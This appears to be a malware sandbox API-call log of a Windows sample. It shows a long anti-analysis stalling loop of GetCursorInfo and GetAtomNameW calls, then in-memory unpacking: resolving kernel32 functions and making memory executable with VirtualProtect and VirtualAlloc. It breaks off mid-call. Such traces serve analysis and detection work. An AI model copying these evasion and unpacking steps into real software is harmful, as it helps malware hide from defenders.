GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.967] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.967] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.967] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.967] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.968] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.968] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.968] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.968] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.968] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.968] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.968] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.968] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.968] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.968] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.968] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.968] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.968] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.968] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.968] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.968] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.968] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.968] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.968] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.968] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.968] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.968] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.968] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.968] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.968] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.968] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.969] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.969] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.969] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.969] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.969] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.969] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.969] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.969] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.969] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.969] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.969] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.969] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.969] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.969] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.969] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.969] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.969] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.969] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.969] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.969] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.969] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.969] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.969] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.969] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.969] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.969] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.969] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.969] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.969] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.970] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.970] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.970] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.970] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.970] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.970] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.970] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.970] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.970] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.970] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.970] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.970] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.970] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.970] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.970] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.970] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.970] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.970] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.970] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.970] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.970] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.970] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.970] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.970] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.970] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.970] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.970] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.970] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.970] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.971] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.971] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.971] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.971] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.971] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.971] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.971] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.972] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.972] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.972] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.972] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.972] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.972] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.972] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.972] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.972] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.972] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.972] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.972] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.972] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.972] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.972] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.972] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.972] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.972] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.972] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.973] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.973] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.973] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.973] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.973] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.973] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.973] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.973] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.973] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.973] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.973] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.973] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.973] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.973] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.973] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.973] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.973] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.973] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.973] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.973] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.973] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.973] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.973] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.974] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.974] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.974] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.974] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.974] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.974] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.974] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.974] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.974] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.974] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.974] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.974] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.974] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.974] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.974] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.974] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.974] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.974] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.974] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.974] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.974] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.974] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.974] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.974] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.974] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.974] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.974] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.974] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.974] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.975] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.975] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.975] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.975] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.975] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.975] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.975] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.975] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.975] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.975] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.975] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.975] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.975] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.975] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.975] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.975] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.975] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.975] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.975] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.975] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.975] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.975] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.975] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.975] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.975] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.975] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.975] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.975] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.975] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.976] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.976] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.976] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.976] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.976] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.976] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.976] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.976] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.976] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.976] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.976] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.976] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.976] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.976] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.976] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.976] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.976] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.976] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.976] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.976] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.976] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.976] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.976] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.976] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.976] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.976] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.976] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.976] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.977] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.977] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.977] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.977] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.977] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.977] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.977] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.977] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.977] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.977] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.977] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.977] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.977] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.977] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.977] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.977] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.977] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.977] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.977] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.977] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.977] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.977] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.977] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.977] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.977] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.977] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.977] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.977] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.977] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.978] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.978] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.978] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.978] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.978] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.978] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.978] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.978] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.978] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0118.931] lstrcatA (in: lpString1="", lpString2="kernel32.dll" | out: lpString1="kernel32.dll") returned="kernel32.dll" [0118.931] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0118.932] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0118.932] LocalAlloc (uFlags=0x0, uBytes=0x90f60) returned 0x300020 [0118.982] VirtualProtect (in: lpAddress=0x300020, dwSize=0x90f60, flNewProtect=0x40, lpflOldProtect=0x18f030 | out: lpflOldProtect=0x18f030*=0x4) returned 1 [0119.238] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0119.238] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0119.239] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0119.239] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0119.239] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0119.239] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0119.239] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0119.239] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0119.239] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0119.242] Module32First (hSnapshot=0x58, lpme=0x18edc0) returned 1 [0119.245] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x720000 [0119.325] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0119.325] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0119.325] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0119.325] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0119.325] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0119.325] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0119.325] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0119.325] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0119.326] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0119.326] SetErrorMode (uMode=0x400) returned 0x0 [0119.326] SetErrorMode (uMode=0x0) returned 0x400 [0119.326] GetVersionExA (in: lpVersionInformation=0x18dcf0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18dcf0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, 